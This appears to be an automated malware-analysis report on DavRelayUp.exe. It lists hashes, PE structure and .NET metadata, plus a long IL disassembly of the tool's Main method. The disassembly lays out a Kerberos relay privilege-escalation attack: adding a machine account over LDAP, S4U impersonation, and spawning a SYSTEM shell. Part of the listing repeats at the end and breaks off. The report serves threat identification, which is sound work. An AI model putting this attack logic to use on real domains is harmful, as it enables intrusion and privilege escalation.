Suspicious
Suspect

3a85d8a51ff724ce38a02d435e0c0bf5

PE Executable | MD5: 3a85d8a51ff724ce38a02d435e0c0bf5 | Size: 1.06 MB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score: Low

Hash | Hash Value
MD5 | 3a85d8a51ff724ce38a02d435e0c0bf5
Sha1 | bf5f9771fad47b1b19f366b88469b829901d0217
Sha256 | 84b24071b0229e189f03bc643027a63c582b02f6e96e82d730e12793cfcd9abb
Sha384 | c41edf9670ed6128c874e05866fc337048e2edc238c092e8544d4a73f5f01ba927d6ddf3e4dfa44d0d43e49f350fed26
Sha512 | be985c41afb2a7a945673f240b977a9fc2a5ede5847d5408a513cde808cd09fef3b4b28de4f7952a85e85f6e7e4f101ace36f0c819b594341687568263147fe9
SSDeep | 24576:2ZeqOjAlC+9nHLmX63wZSGBI/u0+eW81ATw8FD5S7Ms:2Uhsl99nrmXOFp/HJW8itDR
TLSH | FA35E1392BEC5F09E5BF0735E071491906F2F112A4B2FB9EEE85909E2913B44E821777

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
DavRelayUp.DSInternals.Common.Properties.Resources.resources
bouncycastle.crypto
system.runtime.windowsruntime
Informations
Name | Value
Info | PE Detect: PeReader OK (file layout)
Module Name | DavRelayUp.exe
Full Name | DavRelayUp.exe
EntryPoint | System.Void DavRelayUp.Program::Main(System.String[])
Scope Name | DavRelayUp.exe
Scope Type | ModuleDef
Kind | Console
Runtime Version | v4.0.30319
Tables Header Version | 512
WinMD Version | <null>
Assembly Name | DavRelayUp
Assembly Version | 1.0.0.0
Assembly Culture | <null>
Has PublicKey | False
PublicKey Token | <null>
Target Framework | .NETFramework,Version=v4.7.2
Total Strings | 1210
Main Method | System.Void DavRelayUp.Program::Main(System.String[])
Main IL Instruction Count | 676

Main IL

ldstr DavRelayUp - Relaying you to SYSTEM but retro style call System.Void System.Console::WriteLine(System.String) ldarg.0 <null> call System.Void DavRelayUp.Program::ParseArgs(System.String[]) ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase brtrue.s IL_002A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldarg.0 <null> ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) call System.Void DavRelayUp.KrbSCM::RunSystemProcess(System.Int32) leave.s IL_0029: ret pop <null> leave.s IL_0029: ret ret <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.3 <null> bne.un.s IL_0038: ldsfld System.String DavRelayUp.Options::domain call System.Void DavRelayUp.KrbSCM::Run() ret <null> ldsfld System.String DavRelayUp.Options::domain call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0050: call System.Boolean DavRelayUp.Networking::GetDomainInfo() ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_0058: ldsfld System.String DavRelayUp.Options::domainController call System.Boolean DavRelayUp.Networking::GetDomainInfo() brtrue.s IL_0058: ldsfld System.String DavRelayUp.Options::domainController ret <null> ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_008A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldsfld System.String DavRelayUp.Options::domainController call System.String DavRelayUp.Networking::GetDCNameFromIP(System.String) stsfld System.String DavRelayUp.Options::domainController ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_008A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldstr [-] Could not find Domain Controller FQDN From IP. 
Try specifying the FQDN with --DomainController flag. call System.Void System.Console::WriteLine(System.String) ret <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.1 <null> beq.s IL_009D: call System.Void System.Console::WriteLine() ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_030E: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase call System.Void System.Console::WriteLine() ldsfld System.String DavRelayUp.Options::domain call System.String DavRelayUp.Networking::GetDomainDN(System.String) stsfld System.String DavRelayUp.Options::domainDN ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort newobj System.Void System.DirectoryServices.Protocols.LdapDirectoryIdentifier::.ctor(System.String,System.Int32) newobj System.Void System.DirectoryServices.Protocols.LdapConnection::.ctor(System.DirectoryServices.Protocols.LdapDirectoryIdentifier) stloc.0 <null> ldsfld System.Boolean DavRelayUp.Options::useSSL brfalse.s IL_00E7: ldloc.0 ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.3 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_ProtocolVersion(System.Int32) ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_SecureSocketLayer(System.Boolean) br.s IL_00FF: ldloc.0 ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Sealing(System.Boolean) ldloc.0 <null> callvirt 
System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Signing(System.Boolean) ldloc.0 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapConnection::Bind() ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0304: call System.Threading.Tasks.Task DavRelayUp.Program::RelayTask() ldsfld System.Boolean DavRelayUp.Options::rbcdCreateNewComputerAccount brfalse IL_02EF: ldloc.0 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_0132: newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() ldc.i4.s 16 call System.String DavRelayUp.Relay.Helpers::RandomPasswordGenerator(System.Int32) stsfld System.String DavRelayUp.Options::rbcdComputerPassword newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() stloc.1 <null> ldloc.1 <null> ldstr CN= ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr ,CN=Computers, ldsfld System.String DavRelayUp.Options::domainDN call System.String System.String::Concat(System.String,System.String,System.String,System.String) callvirt System.Void System.DirectoryServices.Protocols.AddRequest::set_DistinguishedName(System.String) ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr objectClass ldstr Computer newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection 
System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr SamAccountName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr userAccountControl ldstr 4096 newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr DnsHostName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr ServicePrincipalName ldc.i4.4 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . 
ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Object[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr unicodePwd call System.Text.Encoding System.Text.Encoding::get_Unicode() ldstr " ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Byte[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.0 <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryResponse 
System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) pop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) leave.s IL_02EF: ldloc.0 stloc.2 <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) ldstr [-] ldloc.2 <null> callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave IL_07DD: ret ldloc.0 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::domainDN call System.String DavRelayUp.Program::GetObjectSidForComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stsfld System.String DavRelayUp.Options::rbcdComputerSid call System.Threading.Tasks.Task DavRelayUp.Program::RelayTask() callvirt System.Void System.Threading.Tasks.Task::Wait() ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.2 <null> beq.s IL_032B: ldnull ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_07DD: ret ldsfld System.Boolean DavRelayUp.Options::attackDone brfalse IL_07DD: ret ldnull <null> stloc.3 <null> ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0568: ldsfld DavRelayUp.Options/RelayAttackType 
DavRelayUp.Options::relayAttackType ldc.i4.0 <null> stloc.s V_4 ldnull <null> stloc.s V_5 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03A9: ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_9 ldc.i4.s 18 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldloc.s V_9 ldc.i4 4096 call System.String DavRelayUp.Crypto::KerberosPasswordHash(DavRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_5 ldc.i4.s 18 stloc.s V_4 br.s IL_03C0: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03C0: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash stloc.s V_5 ldc.i4.s 23 stloc.s V_4 ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldloc.s V_5 ldloc.s V_4 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call 
System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_03FF: ldloc.s V_6 ret <null> ldloc.s V_6 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_7 ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_044E: ldloc.s V_7 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_7 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_7 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_8 ldloc.s V_8 brtrue.s IL_047D: ldsfld System.Boolean DavRelayUp.Options::verbose ret <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_04E9: ldloc.s V_7 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String 
DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_8 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_7 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_8 ldc.i4.0 <null> ldnull <null> call System.Byte[] DavRelayUp.S4U::S4U2Proxy(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,DavRelayUp.KRB_CRED,System.Boolean,System.String) stloc.3 <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse IL_071D: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String 
System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) br IL_071D: ldc.i4 1500 ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.2 <null> bne.un IL_071D: ldc.i4 1500 call System.String System.Environment::get_MachineName() ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldsfld System.String DavRelayUp.Options::shadowCredCertificate ldsfld System.String DavRelayUp.Options::shadowCredCertificatePassword ldc.i4.s 18 ldnull <null> ldc.i4.0 <null> ldstr ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_14 ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldloc.s V_14 ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.String) stloc.s V_11 ldloc.s V_11 brtrue.s IL_05C1: ldloc.s V_11 ret <null> ldloc.s V_11 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_12 ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_0610: ldloc.s V_12 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_12 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_12 ldsfld System.String DavRelayUp.Options::impersonateUser 
ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_13 ldloc.s V_13 brtrue.s IL_063F: ldsfld System.Boolean DavRelayUp.Options::verbose ret <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_06AB: ldloc.s V_13 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_13 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_13 ldsfld System.String DavRelayUp.Options::targetSPN ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 call System.Byte[] DavRelayUp.LSA::SubstituteTGSSname(DavRelayUp.KRB_CRED,System.String,System.Boolean,DavRelayUp.lib.Interop.LUID) stloc.3 <null> ldsfld System.Boolean 
DavRelayUp.Options::verbose brfalse.s IL_071D: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> beq.s IL_0739: call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly brfalse IL_07D8: call System.Void DavRelayUp.KrbSCM::Run() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0778: ldsfld System.String DavRelayUp.Options::serviceCommand ldloc.s V_15 ldstr --ServiceName " ldsfld System.String DavRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s 
IL_079C: ldsfld System.String DavRelayUp.Options::netOnlyCommand ldloc.s V_15 ldstr --ServiceCommand " ldsfld System.String DavRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::netOnlyCommand brfalse.s IL_07CA: ldloc.s V_15 ldstr [*] --NetOnlyCommand override requested call System.Void System.Console::WriteLine(System.String) ldstr [*] To get the SYSTEM shell, run ' ldloc.s V_15 ldstr ' in context of the created process call System.String System.String::Concat(System.String,System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldsfld System.String DavRelayUp.Options::netOnlyCommand stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.3 <null> call DavRelayUp.lib.Interop.LUID DavRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> ret <null> call System.Void DavRelayUp.KrbSCM::Run() ret <null>

System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) pop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) leave.s IL_02EF: ldloc.0 stloc.2 <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) ldstr [-] ldloc.2 <null> callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave IL_07DD: ret ldloc.0 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::domainDN call System.String DavRelayUp.Program::GetObjectSidForComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stsfld System.String DavRelayUp.Options::rbcdComputerSid call System.Threading.Tasks.Task DavRelayUp.Program::RelayTask() callvirt System.Void System.Threading.Tasks.Task::Wait() ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.2 <null> beq.s IL_032B: ldnull ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_07DD: ret ldsfld System.Boolean DavRelayUp.Options::attackDone brfalse IL_07DD: ret ldnull <null> stloc.3 <null> ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0568: ldsfld DavRelayUp.Options/RelayAttackType 
DavRelayUp.Options::relayAttackType ldc.i4.0 <null> stloc.s V_4 ldnull <null> stloc.s V_5 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03A9: ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_9 ldc.i4.s 18 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldloc.s V_9 ldc.i4 4096 call System.String DavRelayUp.Crypto::KerberosPasswordHash(DavRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_5 ldc.i4.s 18 stloc.s V_4 br.s IL_03C0: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03C0: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash stloc.s V_5 ldc.i4.s 23 stloc.s V_4 ldsfld System.String 